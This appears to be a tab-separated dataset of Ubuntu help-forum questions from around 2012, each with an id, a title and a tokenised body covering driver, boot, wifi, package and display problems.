216002	ps3mediaserver and ubuntu 12.10	i 'm trying to install ps3mediaserver in ubuntu 12.10 , but it is n't possible . when i try , i get this : ps3mediaserver : depend : ps3mediaserver-multiarch i tried to install ps3mediaserver-multiarch , but got : ps3mediaserver : depende : ps3mediaserver-multiarch using ubuntu software center i get ( pt-br ) : os seguintes pacotes têm dependências não satisfeitas : ps3mediaserver : depends : libc6 ( > = 2.14 ) mas a 2.15-0ubuntu20 será instaladadepends : libgcc1 ( > = 1:4.1.1 ) mas a 1:4.7.2-2ubuntu1 será instaladadepends : libstdc++6 ( > = 4.2.1 ) mas a 4.7.2-2ubuntu1 será instaladadepends : upstart-job mas é um pacote virtual
216004	how do i open a memory stick formatted with exfat ?	i receive the following error message when i try to access my san disk 64 gb memory from my android phone . error mounting : mount : unknown filesystem type 'exfat'
216005	run xscreensaver with gnome-screensaver lock screen	i am running ubuntu 12.10 , and i just switched over from 11.04 . i 'd like to use the xscreensaver functionality ( actually , all i want is for electricsheep to run in the background after i have locked the screen ) , but at the same time , utilize the nicer gnome-screensaver login screen . it seems as though gnome-screensaver should be using xscreensaver , but for some reason , i ca n't get it to work correctly . if i have gnome-screensaver running , it simply blanks the screen . on the other hand , if i run xscreensaver and use the xscreensaver-command -- lock , then it runs the selected screensaver , but it uses the ugly ugly xscreensaver login prompt . i 've read the following : can i replace the xscreensaver lock dialog with the version from gnome-screensaver but it does n't appear to answer the question . instead , it simply answers that there 's a hacky way of 'themeing ' the xscreensaver . any advice on what i should do if i want a halfway decent looking login screen with some type of idle computation/display application ?
216009	how do i install chrome and java ?	i have used google for two hours now . could someone please just write down what i need to enter to install both chrome and java . i am using ubuntu 64 bit and i am new to all of this and finding it rather hard to do anything .
216014	harddisk problem	how to recover entire hard disk lost while installing the ubuntu , i chose the option replace ubuntu in windows 7 and formatted the entire disk . and lost the all file how to recover all files in windows 7 ?
216017	installed ubuntu in vmware player , black side bars / broken gui	i recently installed ubuntu 12.10 in vmware player and have came up with a black sidebar , missing icons , a pretty broken gui . everything works just fine though . i am able to run firefox and open termainal and all that good stuff just fine , it 's just that i can see them on the sidebar . i have to open up a seperate window on windows with a picture of the ubuntu 12.10 desktop in order for me to know what to click on , but once i do click on it , it 's pretty much smooth sailing from there ( not counting closing firefox and several other things ) . again , everything works just fine , but when it comes to the sidebar , the gui , the dashboard ( get a completely black screen for when i open dash board ) , they come up as completely black , broken ( visual tears and what not ) , and hoving over them just brings up a big black bar ( assuming it 's the `` zooming '' in of the icon , but it just shows a black bar of where the icon should be ) . i 'm not exactly sure what so do to get this to work ( to fix the gui ) , any ideas as to what i may do to fix this ?
216022	dual booting ubuntu 12.04 : uefi and legacy	i 'm trying to dual boot ubuntu 12.04 ( or 12.10 ) with windows 8 on a new sony vaio , but have run into some problems : ) specifically , my problems seem to come from choosing uefi or legacy as the bootmode in the bios . here is what i have found so far : windows 8 needs to boot using uefi , and does n't work in legacy mode ubuntu ( both 12.04 and 12.10 ) needs to boot using legacy , and wo n't boot ( at least from the live disk ) in uefi mode i have been able to boot ubuntu using a live usb disc , provided that i change the bootmode to legacy . i have n't committed to installing it yet , because i do n't really understand the consequences . my main concerns are that instead of simply selecting windows or ubuntu in grub , i would also have to change my bootmode every single time , which seems like a lot more trouble than it should be . so , the question : how can i install ubuntu 12.04 or 12.10 in uefi boot mode ?
216024	access top panel sub indicutors sub-menu items without mouse	i am using ubuntu 12.04 , is there any way to access network manager menu at top panel ( indicators area ) without mouse ? may be like we access menu of application by alt - it will be very convenient . is there any way access other indicator 's functions ( sub-menu items of notification , volume , ... ) in top menu without mouse ?
216029	tired of windows . how can switch to ubuntu ?	im thinking strongly about starting to use ubuntu . i am tired of windows and how every computer i get/have runs with it . i 'm not real computer savvy , but i know enough for my needs . ive used ubuntu in the past on a friends computer and was always pretty impressed with what he could make it do , look like , and the fact that he was able to run windows along with it . his computer never crashed or got viruses . that sounds like something i could get used to . that was the biggest selling point . id like to here what some of you think . also , i keep reading about a live cd that allows you to run ubuntu with windows to basically try it and not have to commit . if so , how can i get that . i havent been able to find it anywhere .
216030	boot to black screen from usb	i 've installed ubuntu 12.04 on my asus eeepc 1005peb for school , but i have decided to sell it , and when i go to boot my live usb for windows 7 on the netbook it does n't work . it just boots to a black screen with a cursor . i 've tested the usb on my other computer and it boots just fine .
216032	unity disappear when i activate nvidia driver for 8500 gt	i 'm new to linux , i 've installed ubuntu 12.10 and install nvidia driver for 8500 gt . after the restart unity disappear , all what i see is the desktop , no top menu no dash . i 've tried to install all available drivers , but i get the same issu . so what should i do ?
216039	what language is unity written in ?	what language is unity written in ? also , where can i get its source code ? i have an idea for a windowing enviroment or shell ( dont know what to call it ) . what i want to do is teach myself to create it . i like some of several ideas i have seen , but i want to redo all of them , also the concept of how a desktop works . i figured learning the language unity is written in , and studying unity and gnomes code would be a good start . i am on ubuntu 12.04 acer aspire 5920 3 gb ram 160 gb hard drive
216046	how long does it take to ubuntu 12.10 reboot after installation ?	im stuck on a screen after installing 12.10 ubuntu heres exactly what it says . welcome to ubuntu 12.10 ( gnu/linux 3.5.0-17-generic i686 ) * documentation : https : //help.ubuntu.com/ ubuntuaubuntu : ~ $ broadcast message from root @ ubuntu ( unknown ) at 19:23 ... the system is going to reboot now ! that is exactly what my screen says it has n't rebooted in over 5 minutes .
216049	updating nvidia drivers from 295.40 : what will happen to twinview ?	right now , i have the nvidia proprietary drivers enabled without the ubuntu-x repo , so the driver version is 295.40 ( which is on the official ubuntu repo ) instead of the current 304.64 for my card , but i want to update to the current ( using the ubuntu-x repo ) . from what i heard , after 302.xx , nvidia started supporting randr and removed twinview . my question is , i have twinview enabled for two monitors . if i update to the new version , what will happen to my twinview settings ? will there be any extra work to do to migrate to the new driver ? if it helps any , here 's my xorg.conf : http : //pastebin.com/f19aarsk
216053	firefox can not access internet ubuntu	ubuntu 12.04 installed and run from vmware player ( as guest os in windows 7 ) . firefox can not connect to internet . ipv4 settings : automatic addresses ( dhcp ) only . dns server as in windows . able to ping dns server . not able to ping 8.8.8.8
216055	someone tell me why people writing gnu code use { like that ?	i saw the rules on how to type code for unity project or gnu software in general . why do they write code in such an ugly form ? is there a particular reason why they do n't put brackets the way ( from what i know ) most people do ? why like this : for ( i = 0 ; i < 5 ; i++ ) { //do something } and not like this : for ( i = 0 ; i < 5 ; i++ ) { //do something } or this : for ( i = 0 ; i < 5l i++ ) { //do something } ? ? ?
216056	bumblebee does not work with metacity and kwin , but works with compiz	if i try to launch something with optirun under compiz , it works . if i try to launch something with optirun under kde or metacity , it gives me : [ 247.384077 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) [ 247.384117 ] [ error ] aborting because fallback start is disabled . if it matters , i 'm trying to launch portal 2 with wine i have : nvidia geforce gt540m with optimus acer aspire timeline x intel core i5 and 3000 integrated graphics
216057	how do i make the directories in a zip file relative to the target directory instead of my working directory	i 'm calling the zip command from a script where i can not change directory . i need to make a zip file of the stuff in data/kit123/ from the directory which data resides in , but i want the contents of the zip to only be the contents of kit123 , with paths relative to kit123 . this is the directory structure myworkingdir data kit123 kitpart1 file.xcf anotherfile.xcf kitpart2 ... kit124 ... my script runs in myworkingdir and can not change directories . if i call zip -r kit123.zip data/kit123 then the structure in the zip file will be data kit123 kitpart1 file.xcf anotherfile.xcf kitpart2 but i want it to be kit123 kitpart1 file.xcf anotherfile.xcf kitpart2 is there a zip option i can use to accomplish this ? it seems odd that it should depend on my working directory i know it 's not -j. that one destroys the structure within kit123
216061	metacity malfunction preventing custom gnome session from launching ?	when i try to run metacity in ubuntu2d ( 12.04 ) , i get the following message : alisa @ ubuntu : ~ $ metacity window manager warning : screen 0 on display `` :2.0 '' already has a window manager ; try using the -- replace option to replace the current window manager . i get the same message when running compiz from the command line in 3d ( it opens fine through the gui ) . i understand that these should be the default managers for the respective sessions . i 'm trying to create a custom gnome session using the following instructions : unity launcher-free session . here is what i 've put into my .session file ( note the reference to metacity ) : [ gnome session ] name=custom unity2d session requiredcomponents=gnome-settings-daemon ; requiredproviders=windowmanager ; panel ; defaultprovider-windowmanager=metacity defaultprovider-panel=unity-2d-panel fallbacksession=ubuntu-2d desktopname=gnome i ca n't launch the custom session ( it does show up on my login screen ) . i think metacity might be the problem , since it 's not recognized as the default . please let me know if you think there may be other issues affecting my custom session . i am new to linux , so list anything you think might be helpful . thank you ! update : metacity seems to be the default ... alisa @ ubuntu : ~ $ tail /usr/share/gnome-session/sessions/gnome-fallback.session [ gnome session ] name=gnome fallback ( safe mode ) requiredcomponents=gnome-panel ; gnome-settings-daemon ; requiredproviders=windowmanager ; defaultprovider-windowmanager=metacity defaultprovider-notifications=notify-osd desktopname=gnome alisa @ ubuntu : ~ $ tail /usr/share/gnome-session/sessions/ubuntu-2d.session [ gnome session ] name=ubuntu 2d requiredcomponents=gnome-settings-daemon ; requiredproviders=windowmanager ; panel ; shell ; defaultprovider-windowmanager=metacity defaultprovider-panel=unity-2d-panel defaultprovider-shell=unity-2d-shell desktopname=unity so why the terminal `` window manager warning '' message ?
216065	lubuntu 12.10 : icon display problems	first off , i would like to let you know that i am new to linux . i finally decided to give it a try and my first project was installing lubuntu on an old pc and using it for a media server for my ps3 . so , one thing that i noticed right away is that my icons for applications , files , folders , etc ... are not visible . if i move my mouse over the name of the application or file ( it only works if i move the mouse up from the bottom of the name ) then the icon will appear , but if i move my mouse back over any other place on the file the icon will disappear again . also , if i open a folder sometimes an icon or two will be displayed but the rest wo n't , and like i said before if i move my mouse over the top of the application or file the icon will disappear . is there any way to fix this ? is this normal ? or could it be a problem with my hardware ? i never had this issue when i was running the last os ( windows xp ) . any help would be greatly appreciated . remember , i am new to linux so a thorough explanation would be helpful . also , if there are any tips , tricks , references , or recommendations any of you have to help me jump in and become more familiar with using linux that would be great ! i 'm very interested in taking advantage of the power linux has . currently i am studying computer programming so maybe one day i will be able to develop my own linux distribution .
216066	installing driver for netgear wna1100 wifi adapter - ubuntu server 12.04	i recently purchased the wna1100 wifi adapter for my ubuntu server 12.04 box . since i 'm new to ubuntu , i 'm unable to install the drivers for the wifi adapter . i found that the wifi adapter uses the atheros ar9271 chipset . i downloaded the htc_9271.fw file from the linux wireless site . how do i install the driver ?
216067	uninstall ubuntu and bring back windows 7	i accidently installed ubuntu 12.10 using the option `` lvm '' although i 've not selected erase disk and fresh install . now my systems boots direclt into ubuntu and i 'm unable to see my windows files on hard drive so i 'm unable to access my old data ( documents , movies , music , pictures ) stored on windows ? can someone help me to bring back my old windows ? in fact , i 've now completely erased my hard drive yesterday and its only ubuntu 12.10 running on my laptop and i surely want to install my paid windows 7 home premium back as a dual booting system . but i also like to first try uninstall or revert my ubuntu installations and get back my windows so that i 'll able to at least retrieve my previous data and than perform this new task .
216075	no hdmi output on 12.10 , intel hd graphics ( ironlake )	i am unable to get any output to my external monitor on 12.10 . the monitor is recognized and shows the native res ( 1920x1080 , correct ) but enabling has no effect . graphics chipset is intel ironlake ( arrandale ) . i have tried : full system update after installing oibaf ppa updated drivers ( https : //launchpad.net/~oibaf/+archive/graphics-drivers ) enabling sna kubuntu 12.10 ( in addition to ubuntu 12.10 ) both were fresh installs . nothing works , any troubleshooting ideas ? everything is fine on 11.10 . update 1 : also tried using intel drivers from xorg-edgers ppa ( https : //launchpad.net/~xorg-edgers/+archive/ppa ) still no output on hdmi . update 2 : just tried lubuntu 12.10 , same issue . it appears that any 12.10 downstream distro will likely have this issue . update 3 : output from 'xrandr -q' user @ testbox : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 8192 x 8192 lvds1 connected 1366x768+0+312 ( normal left inverted right x axis y axis ) 256mm x 144mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 598mm x 337mm 1920x1080 60.0*+ 50.0 1680x1050 59.9 1680x945 60.0 1400x1050 74.9 59.9 1600x900 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1280x960 60.0 1366x768 60.0 1360x768 60.0 1280x800 74.9 59.9 1152x864 75.0 1280x768 74.9 60.0 1280x720 60.0 50.0 1024x768 75.0 70.1 60.0 1024x576 60.0 800x600 72.2 75.0 60.3 56.2 720x576 50.0 848x480 60.0 720x480 59.9 640x480 75.0 72.8 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) update 4 : 'xrandr -q ' output from oneiric , hdmi working fine : user @ ptero : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 598mm x 337mm 1920x1080 60.0*+ 1680x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x720 60.0 1024x768 60.0 800x600 60.3 640x480 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis )
216076	ubuntu 12.04 u fails black screen after install	i successfully installed ubuntu 12.04 lts from a usb for dual boot with windows 7 . windows is working fine but ubuntu failed to boot after restart . when i select to start ubuntu it loads a black screen with command prompt . please help i 'm a newbie
216077	if running on discrete card with bumblebee , will games on steam also run on said card ?	i have steam running on ubuntu and loaded using 'optirun ' . will it follow that games that are started through steam will also be using the nvidia discrete card ? it does n't seem to look that way . what commands can be used to tell that it 's running on nvidia ?
216082	ubuntu 12.10 not recognized after installing windows 8	i used to dual boot windows 7 and ubuntu 12.10 on my dell xps 15 , now i installed windows 8 pro and now ubuntu does not appear during boot . there was a similar question asked in some other forum and the solution suggested was to boot with the ubuntu cd . i did the same and tried to boot with the cd , i get the error that no operating system found and windows 8 loads again . i will be really grateful if someone can suggest a solution for this .
216084	how reliable is the battery data in ubuntu the power statistics ?	right now the power statistics show that : energy when full : 25.5 wh energy ( design ) : 93.2 wh and indeed the battery does n't seem to be lasting as long as it used too . my question : is this data reliable ? does it really indicate that i should replace the battery , or could it be the charger , laptop , or os that is stopping the battery from fully charging ? is any way of validating the battery is indeed to blame ? i 'd like to be sure before shelling out 90 $ for a new battery . ( if it helps , the battery is a 3 year old dell 9 cell rated at 90 wh ) .
216086	using ubuntu in version 10.04 ( lucid )	i 'm having difficulty having my 10.04 device `` register '' ; everything worked smoothly setting up iphone , windows , and ubuntu 12.04 . when i look at the devices listing in my ubuntu one account those devices are listed . what do i need to do to connect using 10.04 ?
216087	do i have to make a backup of my files , when i change os ?	iâ´m at a turning point .. to change my os from w7 to ubuntu . the thing is : do i need to make a backup of my files ? or , can i just install the new os and my files will all be quite safe ?
216090	( gimp:3877 ) : pango-warning **:	gimp keeps crashing when i try to use the fonts from text tool . ( gimp:3877 ) : pango-warning ** : failed to create cairo scaled font , expect ugly output . the offending font is 'rsfs10 italic 16' ( gimp:3877 ) : pango-warning ** : font_face status is : < unknown error status > ( gimp:3877 ) : pango-warning ** : scaled_font status is : out of memory ( script-fu:3883 ) : libgimpbase-warning ** : script-fu : gimp_wire_read ( ) : error segmentation fault ( core dumped )
216097	ubuntu nvidia driver 310.14beta stretch opengl feature	i have a hp mini 311 running an outdated version of the nvidia drivers ( the recomended from the additional drivers option ) , alongside my ubuntu 12.04 . now the problem i am running into is the feature `` stretch opengl '' is missing from new releases . i play many old games like starcraft 1 , diablo 1 and 2 , etc . and without the stretch feature on these games they take up 1/10 of my screen making playing extremely horrible on my display ( 1366x768 ) . i will provide more specs below , but i was wondering if anyone using the new 310.14beta driver has seen the option or know how to enable stretched opengl to fit the screen ? system specs : hp mini 311 3 gb ram nvidia ion 1.66 ghz 512 mb video card 320 gb hdd 1366x768 hd display ubuntu 12.04 ( tested 12.10 and ran too choppy on my laptop )
216098	in need of connection help	i 've been stuck at this for a while now and cant figure it out . my friend installed ubuntu 12.10 on my tower and used his internet cable and it worked fine . i asked him before he did it if it was going to be ok with my netgear adapter and he said yes . so i got it back to my place the next day and hooked it up and tried it out . started up fine but could n't read the adapter ( wn111v2 ) so i tried entering the disk for it but it did n't work . i tried running a cord from my computer to the router but nothing happened . i went to the boot menu to access windows to figure it out and there is no more windows . i 'm brand new to linux and have no idea why i ca n't establish a connection to my router ( it 's a wgt624v4 ) and have zero connection to the internet on my computer so i 'm using a windows laptop . is there anything i can do ?
216105	after nvidia driver update screen is 640x480 . how to undo ?	i recently tried to upgrade/update my graphics drivers in ubuntu 12.04 . now the screen is all zoomed to a 640 x 480 resolution and i ca n't figure out how to undo what i did . how can i revert to the old situation ?
216110	how do i find what kernel module is behind a network interface ?	how do i find out what kernel module is used for any given network interface ?
216112	how to install stable `` gnome shell 3.6 '' for ubuntu 12.04 ?	how to install stable `` gnome shell 3.6 '' for ubuntu 12.04 ?
216114	how can i remove modem-manager from boot ?	i would like to remove modem-manager service from my boot , how can i do it ?
216118	usb write speed irregular	i would like some advice on why this is happening to my usb devices ... i have tried a few usb 2.0 pendrives , fat32 , ext4 , ntfs . all no more than 16 gb big . read speeds are fine ( 25-27mb/s ) write speeds however ... start really fast i.e . 50 to 60 mb/s then drops significantly down to 10mb/s before gradually slowing down to 2mb/s and less . overall the copy process is extremely slow . 30min for 3 files totalling 4.5gb and even slower for 8,422 php/css/html files totalling 352mb . where do i begin ? google and forums yielded no help . -- update -- i have run benchmarks since acquiring windows 7 and various other flash pendrives and hdds . there is a significant difference . windows shows transfer speeds averaging around 80mb/s where as ubuntu never averages above 11mb/s . same hardware , same usb ports . this , along with poor battery life is quite disheartening .
216122	hosting one site on two servers	i want to know how host one site on two servers . i am using juju to deploy mediawiki on my maas computers in lan . and now i have two computers with ip 's like this 192.168.1.100 and 192.168.1.115 . how can i make to be seen as one ip ? i want to go one of the ip in webbrowser and i get access less load server . is this possible ?
216124	can i remote upload urls to ubuntuone account ?	there is a file on internet which weighs 3gb , and i need it to directly transfer that file to my ubuntuone account.. can i do that ?
216125	ubuntu installation does not respond after rebooting	i installed ubuntu and after completing the steps at the website and rebooting my computer shows a menu to choose between ubuntu and windows 7 . when i choose ubuntu it shows that it is completing installation and a dialogue box appears which shows the status of `` copying files ... '' and then after a few seconds it shows `` almost finished copying files '' and it remains like that . after this it does not shows any increment in the process so i assume that it is hanged . please help . i already tried opening my windows 7 and it opened just fine . i need to complete my installation today because i need some important data from my external hard disk which is not accessible in windows .
216128	expand window to free space on screen in kde	i am using kubuntu , and i want to expand the current window to the free space on the screen . to say it more precisely : i want to make the current window as big as possible without overlapping new windows ( windows already overlapped should be ignored ) . is there a keyboard shortcut or an extension to the kde window manager that makes such a shortcut or a window button ? i would also appreciate a hint , how to write a script that could do this window thing on keyboard shortcut invocation . i am a programmer but do n't know what the best way is to control kde windows via script .
216132	could not connect to wireless unitl reboot ( nl80211 )	i 'm using samsung np900x3c . i have problem with occasionally connecting to wifi , with ubuntu 12.10 . sometimes my computer could not connect to wifi `` blab '' , neither after reboot computer . only solution is to restart wifi hotspot . it 's public wifi , used by many users , that do n't have that problem . my /var/log/syslog : nov 12 10:09:39 k15 wpa_supplicant [ 1308 ] : wlan0 : sme : trying to authenticate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) nov 12 10:09:39 k15 kernel : [ 8.908610 ] wlan0 : authenticate with 64:70:02:89:7c : d7 nov 12 10:09:39 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating nov 12 10:09:39 k15 kernel : [ 8.915032 ] wlan0 : send auth to 64:70:02:89:7c : d7 ( try 1/3 ) nov 12 10:09:39 k15 wpa_supplicant [ 1308 ] : wlan0 : trying to associate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) nov 12 10:09:39 k15 kernel : [ 8.916753 ] wlan0 : authenticated nov 12 10:09:39 k15 kernel : [ 8.916839 ] wlan0 : waiting for beacon from 64:70:02:89:7c : d7 nov 12 10:09:39 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating nov 12 10:09:39 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected nov 12 10:09:39 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning nov 12 10:09:42 k15 wpa_supplicant [ 1308 ] : wlan0 : sme : trying to authenticate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) nov 12 10:09:42 k15 kernel : [ 12.386212 ] wlan0 : authenticate with 64:70:02:89:7c : d7 nov 12 10:09:42 k15 wpa_supplicant [ 1308 ] : wlan0 : trying to associate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) nov 12 10:09:42 k15 kernel : [ 12.389114 ] wlan0 : send auth to 64:70:02:89:7c : d7 ( try 1/3 ) nov 12 10:09:42 k15 kernel : [ 12.391021 ] wlan0 : authenticated nov 12 10:09:42 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating nov 12 10:09:42 k15 kernel : [ 12.391332 ] wlan0 : waiting for beacon from 64:70:02:89:7c : d7 nov 12 10:09:42 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating nov 12 10:09:43 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected nov 12 10:09:43 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning nov 12 10:09:46 k15 wpa_supplicant [ 1308 ] : wlan0 : sme : trying to authenticate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) and after restart wifi , i could connect : nov 12 10:11:51 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning nov 12 10:11:55 k15 wpa_supplicant [ 1308 ] : wlan0 : sme : trying to authenticate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) nov 12 10:11:55 k15 kernel : [ 144.445154 ] wlan0 : authenticate with 64:70:02:89:7c : d7 nov 12 10:11:55 k15 kernel : [ 144.453994 ] wlan0 : send auth to 64:70:02:89:7c : d7 ( try 1/3 ) nov 12 10:11:55 k15 wpa_supplicant [ 1308 ] : wlan0 : trying to associate with 64:70:02:89:7c : d7 ( ssid='blab ' freq=2427 mhz ) nov 12 10:11:55 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating nov 12 10:11:55 k15 kernel : [ 144.455860 ] wlan0 : authenticated nov 12 10:11:55 k15 kernel : [ 144.458681 ] wlan0 : associate with 64:70:02:89:7c : d7 ( try 1/3 ) nov 12 10:11:55 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating nov 12 10:11:55 k15 kernel : [ 144.462799 ] wlan0 : rx assocresp from 64:70:02:89:7c : d7 ( capab=0x431 status=0 aid=9 ) nov 12 10:11:55 k15 kernel : [ 144.486368 ] wlan0 : associated nov 12 10:11:55 k15 wpa_supplicant [ 1308 ] : wlan0 : associated with 64:70:02:89:7c : d7 nov 12 10:11:55 k15 kernel : [ 144.487435 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready nov 12 10:11:55 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated nov 12 10:11:55 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake this problem is appearing regulary . my wifi device control is nl80211 . nov 12 10:09:32 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : using nl80211 for wifi device control nov 12 10:09:32 k15 networkmanager [ 1004 ] : < warn > ( wlan0 ) : driver supports access point ( ap ) mode nov 12 10:09:32 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'iwlwifi ' ifindex : 3 ) nov 12 10:09:32 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : exported as /org/freedesktop/networkmanager/devices/0 nov 12 10:09:32 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : now managed nov 12 10:09:32 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] nov 12 10:09:32 k15 networkmanager [ 1004 ] : < info > ( wlan0 ) : bringing up device .
216135	signature could n't be verified problem with updating	i wanted to install lamp , but did n't install it properly somehow . so trying to remove previous package , i used purge . a large number of package got uninstalled like software centre etc . when i rebooted my system it was unable to login to my desktop . something like running in low graphic mode appeared . i installed gnome desktop . i was able to login to gnome desktop then , but there was no end to my problem after that . i am unable to update now and several package are getting installed with errors . w : gpg error : `` http : //dl.google.com '' stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 w : gpg error : `` http : //archive.canonical.com '' precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : gpg error : `` http : //archive.getdeb.net '' precise-getdeb release : the following signatures could n't be verified because the public key is not available : no_pubkey a8a515f046d7e7cf w : gpg error : `` http : //in.archive.ubuntu.com '' precise release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : gpg error : `` http : //in.archive.ubuntu.com '' precise-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : gpg error : `` http : //in.archive.ubuntu.com '' precise-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : gpg error : `` http : //in.archive.ubuntu.com '' precise-proposed release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 w : gpg error : `` http : //in.archive.ubuntu.com '' precise-backports release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 437d05b5 3e5c1192 sudo apt-get update result of my cat /etc/apt/sources.list query are as follows : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see `` http : //help.ubuntu.com/community/upgradenotes '' for how to upgrade to # newer versions of the distribution . deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise main restricted deb-src `` http : //in.archive.ubuntu.com/ubuntu/ '' precise main restricted # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise universe deb-src `` http : //in.archive.ubuntu.com/ubuntu/ '' precise universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise multiverse deb-src `` http : //in.archive.ubuntu.com/ubuntu/ '' precise multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-security main restricted deb-src `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-security main restricted deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-security universe deb-src `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-security universe deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-security multiverse deb-src `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb-src `` http : //archive.canonical.com/ubuntu '' precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb `` http : //extras.ubuntu.com/ubuntu '' precise main deb-src `` http : //extras.ubuntu.com/ubuntu '' precise main deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-updates restricted main multiverse universe deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-proposed restricted main multiverse universe deb `` http : //in.archive.ubuntu.com/ubuntu/ '' precise-backports restricted main multiverse universe i think some core components of my system have been reduced .
216137	triggering an action when a specific volume is connected	i have a usb key that contains my keepass2 password database and i 'd like to perform some actions when it is plugged into my computer , namely : auto-mount it to some specific location when the mounting is done properly , launching keepass2 on the password database file simple tasks i guess , but i ca n't find how to do that . i 'm using ubuntu 12.10 , and it auto-mounts the device as a `` media usb-key '' and tries to open the images on it ( even though there are none ) . what is the best way to do that and to disable the ubuntu auto-mounting ( so it does n't conflict ) ?
216140	error doing sudo apt-get update xubuntu 12.10	i keep getting this error every time i do sudo apt-get update in the terminal . also i 'm completely incapable of installing anything through the terminal , even after adding the required , up-to-date repository using the add-apt-repository command . any help will be appreciated . gpg error : http : //packages.ubuntu.com quantal release : the following signatures were invalid : nodata 1 nodata 2
